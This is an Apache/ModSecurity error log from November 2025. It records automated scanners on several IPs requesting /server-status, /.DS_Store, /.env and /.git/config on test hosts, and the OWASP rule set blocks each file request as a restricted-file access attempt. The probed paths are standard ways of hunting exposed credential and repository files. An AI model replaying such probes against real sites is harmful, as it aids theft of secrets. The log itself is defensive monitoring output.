[Mon Nov 10 13:01:35.541645 2025] [:error] [pid 4146483] [client 146.190.63.48:48350] [client 146.190.63.48] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRHUHzpnbFjtMU_AVy8HjgAAAAQ"]
[Mon Nov 10 13:01:36.043095 2025] [:error] [pid 4149034] [client 146.190.63.48:48352] [client 146.190.63.48] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRHUILrzr4uBvRHfxzKZjQAAAAs"]
[Mon Nov 10 13:01:36.043328 2025] [:error] [pid 4149034] [client 146.190.63.48:48352] [client 146.190.63.48] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRHUILrzr4uBvRHfxzKZjQAAAAs"]
[Mon Nov 10 13:01:36.043493 2025] [:error] [pid 4149034] [client 146.190.63.48:48352] [client 146.190.63.48] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRHUILrzr4uBvRHfxzKZjQAAAAs"]
[Mon Nov 10 17:35:04.530273 2025] [authz_core:error] [pid 4146498] [client 206.81.24.227:40716] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Mon Nov 10 17:35:08.409716 2025] [:error] [pid 4146497] [client 206.81.24.227:40746] [client 206.81.24.227] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aRIUPGk_ZOxM2RQC8XBidwAAAAY"]
[Mon Nov 10 17:35:08.409943 2025] [:error] [pid 4146497] [client 206.81.24.227:40746] [client 206.81.24.227] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aRIUPGk_ZOxM2RQC8XBidwAAAAY"]
[Mon Nov 10 17:35:08.410150 2025] [:error] [pid 4146497] [client 206.81.24.227:40746] [client 206.81.24.227] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aRIUPGk_ZOxM2RQC8XBidwAAAAY"]
[Mon Nov 10 17:35:09.072582 2025] [:error] [pid 4160389] [client 206.81.24.227:40756] [client 206.81.24.227] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRIUPdo79vn1a0Z-GRb1AAAAAAw"]
[Mon Nov 10 17:35:09.072792 2025] [:error] [pid 4160389] [client 206.81.24.227:40756] [client 206.81.24.227] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRIUPdo79vn1a0Z-GRb1AAAAAAw"]
[Mon Nov 10 17:35:09.072976 2025] [:error] [pid 4160389] [client 206.81.24.227:40756] [client 206.81.24.227] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRIUPdo79vn1a0Z-GRb1AAAAAAw"]
[Mon Nov 10 17:35:09.878362 2025] [:error] [pid 4146482] [client 206.81.24.227:40760] [client 206.81.24.227] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRIUPQrhGfuuFKhoNpx_rAAAAAM"]
[Mon Nov 10 17:35:09.878580 2025] [:error] [pid 4146482] [client 206.81.24.227:40760] [client 206.81.24.227] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRIUPQrhGfuuFKhoNpx_rAAAAAM"]
[Mon Nov 10 17:35:09.878757 2025] [:error] [pid 4146482] [client 206.81.24.227:40760] [client 206.81.24.227] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRIUPQrhGfuuFKhoNpx_rAAAAAM"]
[Wed Nov 12 10:59:30.689789 2025] [authz_core:error] [pid 6184] [client 147.182.200.94:38752] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Wed Nov 12 10:59:32.339393 2025] [:error] [pid 1693] [client 147.182.200.94:38768] [client 147.182.200.94] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aRRahONmqIGv9yjKMPHCdgAAAAo"]
[Wed Nov 12 10:59:32.339631 2025] [:error] [pid 1693] [client 147.182.200.94:38768] [client 147.182.200.94] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aRRahONmqIGv9yjKMPHCdgAAAAo"]
[Wed Nov 12 10:59:32.339813 2025] [:error] [pid 1693] [client 147.182.200.94:38768] [client 147.182.200.94] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aRRahONmqIGv9yjKMPHCdgAAAAo"]
[Wed Nov 12 10:59:32.847155 2025] [:error] [pid 1399] [client 147.182.200.94:38776] [client 147.182.200.94] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRRahI0A-UBLdRnyVSpnswAAAAQ"]
[Wed Nov 12 10:59:32.847412 2025] [:error] [pid 1399] [client 147.182.200.94:38776] [client 147.182.200.94] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRRahI0A-UBLdRnyVSpnswAAAAQ"]
[Wed Nov 12 10:59:32.847588 2025] [:error] [pid 1399] [client 147.182.200.94:38776] [client 147.182.200.94] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRRahI0A-UBLdRnyVSpnswAAAAQ"]
[Wed Nov 12 10:59:33.348783 2025] [:error] [pid 9679] [client 147.182.200.94:38780] [client 147.182.200.94] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRRahQ1k7LgK9712GUBVwwAAAAM"]
[Wed Nov 12 10:59:33.349042 2025] [:error] [pid 9679] [client 147.182.200.94:38780] [client 147.182.200.94] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRRahQ1k7LgK9712GUBVwwAAAAM"]
[Wed Nov 12 10:59:33.349270 2025] [:error] [pid 9679] [client 147.182.200.94:38780] [client 147.182.200.94] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRRahQ1k7LgK9712GUBVwwAAAAM"]
[Wed Nov 12 15:03:49.129269 2025] [authz_core:error] [pid 11157] [client 159.223.132.86:45812] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Wed Nov 12 15:03:50.129097 2025] [:error] [pid 11035] [client 159.223.132.86:45842] [client 159.223.132.86] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aRSTxrnAAM7f_REZ45JnVwAAAAU"]
[Wed Nov 12 15:03:50.129354 2025] [:error] [pid 11035] [client 159.223.132.86:45842] [client 159.223.132.86] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aRSTxrnAAM7f_REZ45JnVwAAAAU"]
[Wed Nov 12 15:03:50.129584 2025] [:error] [pid 11035] [client 159.223.132.86:45842] [client 159.223.132.86] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aRSTxrnAAM7f_REZ45JnVwAAAAU"]
[Wed Nov 12 15:03:50.464514 2025] [:error] [pid 12152] [client 159.223.132.86:45852] [client 159.223.132.86] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRSTxo9YMi3b4TB_oszmxwAAAAQ"]
[Wed Nov 12 15:03:50.464795 2025] [:error] [pid 12152] [client 159.223.132.86:45852] [client 159.223.132.86] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRSTxo9YMi3b4TB_oszmxwAAAAQ"]
[Wed Nov 12 15:03:50.464967 2025] [:error] [pid 12152] [client 159.223.132.86:45852] [client 159.223.132.86] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRSTxo9YMi3b4TB_oszmxwAAAAQ"]
[Wed Nov 12 15:03:50.759481 2025] [:error] [pid 11151] [client 159.223.132.86:45854] [client 159.223.132.86] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRSTxqjhDNEL2cPyBrpQugAAAAE"]
[Wed Nov 12 15:03:50.759720 2025] [:error] [pid 11151] [client 159.223.132.86:45854] [client 159.223.132.86] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRSTxqjhDNEL2cPyBrpQugAAAAE"]
[Wed Nov 12 15:03:50.759887 2025] [:error] [pid 11151] [client 159.223.132.86:45854] [client 159.223.132.86] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRSTxqjhDNEL2cPyBrpQugAAAAE"]
[Fri Nov 14 08:09:12.232381 2025] [authz_core:error] [pid 51833] [client 157.230.19.140:41492] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Fri Nov 14 08:09:12.494205 2025] [:error] [pid 53002] [client 157.230.19.140:41522] [client 157.230.19.140] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aRbVmDGmu4POMgYE2zsmIAAAAAU"]
[Fri Nov 14 08:09:12.494480 2025] [:error] [pid 53002] [client 157.230.19.140:41522] [client 157.230.19.140] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aRbVmDGmu4POMgYE2zsmIAAAAAU"]
[Fri Nov 14 08:09:12.494647 2025] [:error] [pid 53002] [client 157.230.19.140:41522] [client 157.230.19.140] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aRbVmDGmu4POMgYE2zsmIAAAAAU"]
[Fri Nov 14 08:09:12.548821 2025] [:error] [pid 51807] [client 157.230.19.140:41530] [client 157.230.19.140] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRbVmK6U2YHYYJeDawZfIAAAAAg"]
[Fri Nov 14 08:09:12.549061 2025] [:error] [pid 51807] [client 157.230.19.140:41530] [client 157.230.19.140] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRbVmK6U2YHYYJeDawZfIAAAAAg"]
[Fri Nov 14 08:09:12.549221 2025] [:error] [pid 51807] [client 157.230.19.140:41530] [client 157.230.19.140] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRbVmK6U2YHYYJeDawZfIAAAAAg"]
[Fri Nov 14 08:09:12.599303 2025] [:error] [pid 56425] [client 157.230.19.140:41534] [client 157.230.19.140] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRbVmCHeh2EO446Dj0Gx8QAAAAM"]
[Fri Nov 14 08:09:12.599523 2025] [:error] [pid 56425] [client 157.230.19.140:41534] [client 157.230.19.140] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRbVmCHeh2EO446Dj0Gx8QAAAAM"]
